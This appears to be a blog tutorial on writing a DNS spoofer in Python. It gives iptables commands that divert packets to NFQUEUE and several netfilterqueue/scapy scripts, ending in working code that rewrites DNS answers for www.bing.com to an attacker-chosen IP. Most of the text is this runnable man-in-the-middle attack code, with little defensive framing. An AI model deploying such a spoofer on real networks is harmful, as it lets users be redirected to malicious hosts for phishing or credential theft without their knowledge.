WRITING A DNS SPOOFER

2 min read
0

#DNS SERVER

SERVER: A server is a computer LIKE U HAVE, the only difference is that it has more data/resources/programs...

EXPLANATION: If a user search facebook.com it will go to the DNS server and convert facebook.com to an IP address of the Facebook so that the computer can read and hence forth it go to the Facebook web-server and access the data and give to the user

#DNS SPOOFING: ROLE-OF-MITM

EXPLANATION: If a user search facebook.com it will go to the HACKER computer and HACKER can modify the IP with hs desire IP

 #INTERCEPTING PACKET

IPTABLE: Simply put, iptables is a firewall program for Linux. It will monitor traffic from and to your server using tables. These tables contain sets of rules, called chains, that will filter incoming and outgoing data packets.

# RUN: iptables -I FORWARD -j NFQUEUE --queue-num 0

# TO CLEAR IP-TABLE:iptables --flush

# INSTALL NET-FILTER: pip install netfilterqueue

# CODE: /NOT/ALLOW INTERNET TO FLOW!/NET-CUT

  1. #!/usr/bin/env python
  2. import netfilterqueue


  5. def process_packet(packet):
  6.     print(packet)
  7.     packet.accept()


  10. queue = netfilterqueue.NetfilterQueue()
  11. queue.bind(0, process_packet)
  12. queue.run()


# REDING-DATA/CONVERTING PACKET TO SCAPY PACKETS

WE ARE GETTING DATA IN THE FORM OF PACKET
SO TO CONVERT PACKET INTO READABLE DATA WE USE
get_payload() [GIVE-LESS-REDABLE-DATA]

BUT THE RESULT IS UNREADABLE SO WE CONVERT
get_payload --->  SCAPY

WHY WE CONVERT INTO SCAPY?
BCZ BY USING .show()[ONLY-WE-CAN-USE-IN-SCAPY]
WE CAN FIND LAYES/FIELDS...
AS WE DONE IN PACKET SNIFFER..

# CODE: PACKET-->DATA-->REDABLE-DATA(SCAPY)
  1. #!/usr/bin/env python
  2. import netfilterqueue
  3. import scapy.all as scapy


  6. def process_packet(packet):
  7.     scapy_packet = scapy.IP(packet.get_payload())
  8.     print(scapy_packet.show())
  9.     packet.accept()


  12. queue = netfilterqueue.NetfilterQueue()
  13. queue.bind(0, process_packet)
  14. queue.run()

# FILTERING DNS RESPONSES


#FOR-REMOTE-PC
-RUN: iptables -I OUTPUT -j NFQUEUE --queue-num 0
-RUN: iptables -I INPUT -j NFQUEUE --queue-num 0

#FOR-LOCAL-PC
-RUN: iptables -I FORWARD -j NFQUEUE --queue-num 0

#SITE-NAME!
-RUN: ping -c 1 www.bing.com

# CODE: FOR WEB IP-
  1. #!/usr/bin/env python
  2. import netfilterqueue
  3. import scapy.all as scapy


  6. def process_packet(packet):
  7.     scapy_packet = scapy.IP(packet.get_payload())
  8.     if scapy_packet.haslayer(scapy.DNSRR):
  9.       print(scapy_packet.show())
  10.     packet.accept()


  13. queue = netfilterqueue.NetfilterQueue()
  14. queue.bind(0, process_packet)
  15. queue.run()
# MITM-CHANGING IP OF THE WEBSITE
# MODEFYING PACKET-IN-DNS-LAYER

# CODE: FOR WEB IP-
  1. #!/usr/bin/env python
  2. import netfilterqueue
  3. import scapy.all as scapy

  5. def process_packet(packet):
  6.     scapy_packet = scapy.IP(packet.get_payload())

  8.     if scapy_packet.haslayer(scapy.DNSRR):
  9.         qname = scapy_packet[scapy.DNSQR].qname

  11.         if "www.bing.com" in qname:

  13.             print("[+] Spoofing target")

  15.             answer = scapy.DNSRR(rrname=qname, rdata="10.0.2.15")

  17.             scapy_packet[scapy.DNS].an = answer

  19.             scapy_packet[scapy.DNS].ancount = 1

  21.             del scapy_packet[scapy.IP].len
  22.             del scapy_packet[scapy.IP].chksum
  23.             del scapy_packet[scapy.UDP].chksum
  24.             del scapy_packet[scapy.UDP].len

  26.             packet.set_payload(str(scapy_packet))

  28.     packet.accept()

  30. queue = netfilterqueue.NetfilterQueue()
  31. queue.bind(0, process_packet)
  32. queue.run()



4.94 / 169 rates

Post a Comment

If you have any doubts, please let me know

Previous Post Next Post